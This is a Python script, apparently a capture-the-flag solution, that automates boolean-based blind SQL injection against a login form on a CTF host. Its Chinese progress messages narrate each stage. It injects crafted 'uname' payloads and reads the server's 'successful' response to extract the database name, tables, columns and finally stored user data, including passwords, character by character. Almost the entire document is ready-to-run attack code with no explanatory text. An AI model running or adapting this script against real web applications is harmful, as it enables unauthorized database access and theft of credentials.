1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160
| import string import requests
def ascii_str(): str_list = [] for i in range(33, 127): str_list.append(chr(i)) return str_list
def db_length(url, str): print("[-]开始测试数据库名长度.......") num = 1 while True: db_payload = { 'uname':'admin' + f"' and length(database()) like {num}#", 'psw' : 123456 } r = requests.post(url=url,data=db_payload) if str in r.text: db_length = num print("[+]数据库长度:%d\n" % db_length) db_name(db_length) break else: num += 1
def db_name(db_length): print("[-]开始测试数据库名.......") db_name = '' str_list = ascii_str() for i in range(1, db_length + 1): for j in str_list: db_payload = { 'uname': 'admin' + f"' and (ord(mid(database(),{i},1)) like {ord(j)})#", 'psw': 123456 }r = requests.post(url=url, data=db_payload) if str in r.text: db_name += j print(db_name) break print("[+]数据库名:%s\n" % db_name) tb_piece(db_name) return db_name
def tb_piece(db_name): global tb_piece print("开始测试%s数据库有几张表........" % db_name) for i in range(10): tb_payload = { 'uname': 'admin' + f"' and {i} like (Select Count(Table_name) From Information_schema.tables Where table_schema like '{db_name}')#", 'psw': 123456 } r = requests.post(url=url, data=tb_payload) if str in r.text: tb_piece = i break print(f"[+]{db_name}库一共有{tb_piece}张表\n") tb_name(db_name, tb_piece)
def tb_name(db_name, tb_piece): print("[-]开始猜解表名.......") table_list = [] for i in range(tb_piece): str_list = ascii_str() tb_length = 0 tb_name = '' for j in range(1, 20): tb_payload = { 'uname': 'admin' + f"' and (Select length(table_name) from Information_schema.tables Where table_schema like database() limit {i},1) like {j}#", 'psw': 123456 } r = requests.post(url=url, data=tb_payload) if str in r.text: tb_length = j print("第%d张表名长度:%s" % (i + 1, tb_length)) for k in range(1, tb_length + 1): for l in str_list: tb_payload = { 'uname': 'admin' + f"' and (Select ord(mid((Select table_name from Information_schema.tables Where table_schema like database() limit {i},1),{k},1))) like {ord(l)}#", 'psw': 123456 } r = requests.post(url=url, data=tb_payload) if str in r.text: tb_name += l print("[+]:%s" % tb_name) table_list.append(tb_name) break print("\n[+]%s库下的%s张表:%s\n" % (db_name, tb_piece, table_list)) column_num(table_list, db_name)
def column_num(table_list, db_name): print("[-]开始猜解每张表的字段数:.......") column_num_list = [] for i in table_list: for j in range(30): column_payload = { 'uname': 'admin' + f"' and {j} like (Select count(column_name) from Information_schema.columns Where table_name like '{i}')#", 'psw': 123456 } r = requests.post(url=url, data=column_payload) if str in r.text: column_num = j column_num_list.append(column_num) print("[+]%s表\t%s个字段" % (i, column_num)) break print("\n[+]表对应的字段数:%s\n" % column_num_list) column_name(table_list, column_num_list)
def column_name(table_list, column_num_list): print("[-]开始猜解每张表的字段名.......") column_length = [] str_list = ascii_str() column_name_list = [] for t in range(len(table_list)): print("\n[+]%s表的字段:" % table_list[t]) for i in range(column_num_list[t]): column_name = '' for j in range(1, 21): column_payload = { 'uname': 'admin' + f"' and {j-1} like (Select length(column_name) from Information_schema.columns Where table_name like '{table_list[t]}' limit {i},1)#", 'psw': 123456 } r = requests.post(url=url, data=column_payload) if str in r.text: column_length.append(j) break for k in str_list: column_payload = { 'uname': 'admin' + f"' and ord(mid((Select column_name from Information_schema.columns Where table_name like '{table_list[t]}' limit {i},1),{j},1)) like {ord(k)}#", 'psw': 123456 } r = requests.post(url=url, data=column_payload) if str in r.text: column_name += k print('[+]:%s' % column_name) column_name_list.append(column_name) dump_data(table_list, column_name_list,)
def dump_data(table_list,column_name_list): for l in range(1, 50): for k in range(32,127): data_payload = { 'uname': 'admin' + f"' and Ascii(Substr((Select {column_name_list[5]} from {table_list[0]} limit 0,1),{l},1)) like {k}#", 'psw': 123456 } r = requests.post(url=url, data=data_payload) if str in r.text: character = chr(k) print(character,end="") break
if __name__ == '__main__': url = "http://challenge.qsnctf.com:31695/login.php" str = "successful" table_list=['users'] column_name_list=['USER','CURRENT_CONNECTIONS','TOTAL_CONNECTIONS','id','username','password'] dump_data(table_list,column_name_list)
|